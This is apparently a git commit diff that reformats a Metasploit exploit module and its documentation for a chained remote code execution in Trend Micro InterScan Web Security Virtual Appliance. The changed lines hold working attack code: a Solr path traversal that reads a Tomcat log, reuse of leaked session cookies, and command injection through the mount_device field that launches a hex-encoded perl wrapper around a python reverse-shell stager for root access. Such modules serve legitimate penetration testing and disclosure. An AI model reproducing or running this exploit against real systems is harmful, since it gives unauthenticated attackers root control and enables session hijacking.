fixing up some styles and such
This commit is contained in:
parent
260607e8f9
commit
6a3633c2c0
|
@ -7,22 +7,22 @@ The specific flaw exists within the `LogSettingHandler` class of administrator i
|
|||
parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage
|
||||
this vulnerability to execute code in the context of root. But authentication is required to exploit this vulnerability.
|
||||
|
||||
Another specific flaw exists within the proxy service, which listens on port 8080 by default. Unauthenticated users can exploit this
|
||||
Another specific flaw exists within the proxy service, which listens on port `8080` by default. Unauthenticated users can exploit this
|
||||
vulnerability to communicate with internal services in the product.
|
||||
|
||||
Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the file
|
||||
Last but not least a flaw exists within the Apache Solr application, which is installed within the product. When parsing the `file`
|
||||
parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this
|
||||
vulnerability to disclose information in the context of IWSS user.
|
||||
vulnerability to disclose information in the context of the `IWSS` user.
|
||||
|
||||
Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.
|
||||
Due to a combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the `root` user.
|
||||
|
||||
Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.
|
||||
Versions prior to 6.5 SP2 Patch 4 (Build 1901) are affected.
|
||||
|
||||
**Vulnerable Application Installation Steps**
|
||||
### Vulnerable Application Installation Steps
|
||||
|
||||
Trend Micro Web Security is distrubed as an ISO image by Trend Micro.
|
||||
|
||||
Following steps are valid on the CentOS 6 x64 bit operating system.
|
||||
The following steps are valid on the CentOS 6 x64 bit operating system.
|
||||
|
||||
1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
|
||||
2. Find "InterScan Web Security Virtual Appliance" and click.
|
||||
|
@ -37,7 +37,7 @@ Following steps are valid on the CentOS 6 x64 bit operating system.
|
|||
- 8 GB of memory at least.
|
||||
- 60 GB of disk size at least.
|
||||
|
||||
**Why Perl wrapper for python stager?**
|
||||
### Why perl wrapper for python stager?
|
||||
|
||||
Within the exploit function, you can see a custom Perl wrapper usage for python stager payload. The parameter that contains our payload is
|
||||
going through escaping (double quotes, backslash, etc) and blacklist checks on the server-side. Most of the cmd payload will not work under
|
||||
|
@ -63,13 +63,13 @@ contain any special characters.
|
|||
5. Run `check`
|
||||
6. **Verify** that you are seeing `The target is vulnerable.`
|
||||
7. Run `exploit`
|
||||
8. **Verify** that you are seeing `Latest session id is successfully extracted : 29A589E94A0BC0954F7F9B1FE7EC8858` in console.
|
||||
8. You should get a root shell
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
This module has been tested against Trend Micro Web Security 6.5-SP2_Build_Linux_1852.
|
||||
### Trend Micro Web Security 6.5-SP2_Build_Linux_1852
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/trendmicro_websecurity_exec
|
||||
|
|
|
@ -8,12 +8,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',
|
||||
'Description' => %q{
|
||||
'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits multiple vulnerabilities together in order to achive a remote code execution.
|
||||
Unauthenticated users can execute a terminal command under the context of the root user.
|
||||
|
||||
|
@ -27,18 +27,18 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
Last but not least a flaw exists within the Apache Solr application, which is installed within the product.
|
||||
When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.
|
||||
An attacker can leverage this vulnerability to disclose information in the context of IWSS user.
|
||||
An attacker can leverage this vulnerability to disclose information in the context of the IWSS user.
|
||||
|
||||
Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.
|
||||
|
||||
Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
|
||||
],
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2020-8604'],
|
||||
['CVE', '2020-8605'],
|
||||
|
@ -47,25 +47,25 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
['ZDI', '20-677'],
|
||||
['ZDI', '20-678']
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true,
|
||||
'payload' => 'python/meterpreter/reverse_tcp',
|
||||
'WfsDelay' => 30
|
||||
'WfsDelay' => 30
|
||||
},
|
||||
'Payload' =>
|
||||
'Payload' =>
|
||||
{
|
||||
'Compat' =>
|
||||
'Compat' =>
|
||||
{
|
||||
'ConnectionType' => '-bind'
|
||||
}
|
||||
},
|
||||
'Platform' => ['python'],
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Targets' => [ ['Automatic', {}] ],
|
||||
'Platform' => ['python'],
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Targets' => [ ['Automatic', {}] ],
|
||||
'DisclosureDate' => '2020-06-10',
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultTarget' => 0,
|
||||
'Notes' =>
|
||||
{
|
||||
'Stability' => [CRASH_SAFE],
|
||||
|
@ -92,19 +92,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
port_restore = datastore['RPORT']
|
||||
datastore['RPORT'] = datastore['PROXY_PORT']
|
||||
|
||||
@jsessionid = ""
|
||||
@jsessionid = ''
|
||||
|
||||
# We are exploiting proxy service vulnerability in order to fetch content of catalina.out file
|
||||
print_status('Trying to extract session ID by exploiting reverse proxy service')
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
|
||||
'vars_get' => {
|
||||
'command' => 'filecontent',
|
||||
'wt' => 'filestream',
|
||||
'generation' => 1,
|
||||
'file' => "../"*7 << "var/iwss/tomcat/logs/catalina.out",
|
||||
'method' => 'GET',
|
||||
'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
|
||||
'vars_get' => {
|
||||
'command' => 'filecontent',
|
||||
'wt' => 'filestream',
|
||||
'generation' => 1,
|
||||
'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out'
|
||||
}
|
||||
})
|
||||
|
||||
|
@ -132,20 +132,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
print_good("Extracted number of JSESSIONID : #{cookies.length}")
|
||||
print_good("Extracted number of JSESSIONID: #{cookies.length}")
|
||||
|
||||
# We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables.
|
||||
datastore['SSL'] = true if ssl_restore
|
||||
datastore['RPORT'] = port_restore
|
||||
|
||||
# Latest cookie in the log file is the one most probably active. So that we use reverse on array.
|
||||
cookies.reverse.each_with_index do |cookie, index|
|
||||
cookies.reverse.each_with_index do |cookie, index|
|
||||
print_status("Testing JSESSIONID ##{index} : #{cookie}")
|
||||
|
||||
# This endpoints is basically check session :)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),
|
||||
'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),
|
||||
'cookie' => "JSESSIONID=#{cookie}"
|
||||
})
|
||||
|
||||
|
@ -156,12 +156,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
# If the cookie is active !
|
||||
if res.code == 200 && res.body.include?('session_flag')
|
||||
print_good("Awesome !!! JESSIONID ##{index} is active.")
|
||||
print_good("Awesome!!! JESSIONID ##{index} is active.")
|
||||
@jsessionid = cookie
|
||||
break
|
||||
end
|
||||
|
||||
print_warning("JSESSIONID ##{index} is inactive ! Moving to the next one.")
|
||||
print_warning("JSESSIONID ##{index} is inactive! Moving to the next one.")
|
||||
end
|
||||
|
||||
if @jsessionid.empty?
|
||||
|
@ -217,20 +217,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# For that reason, I am planting our payload dropper within the perl command.
|
||||
|
||||
cmd = "python -c \"#{payload.encoded}\""
|
||||
final_payload = cmd.to_s.unpack("H*").first
|
||||
final_payload = cmd.to_s.unpack1('H*')
|
||||
p = "perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
|
||||
|
||||
vars_post = {
|
||||
mount_device: "mount $(#{p}) /var/offload",
|
||||
cmd: 'mount'
|
||||
mount_device: "mount $(#{p}) /var/offload",
|
||||
cmd: 'mount'
|
||||
}
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),
|
||||
'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),
|
||||
'cookie' => "JSESSIONID=#{@jsessionid}",
|
||||
'ctype' => 'application/json',
|
||||
'data' => vars_post.to_json
|
||||
'ctype' => 'application/json',
|
||||
'data' => vars_post.to_json
|
||||
})
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue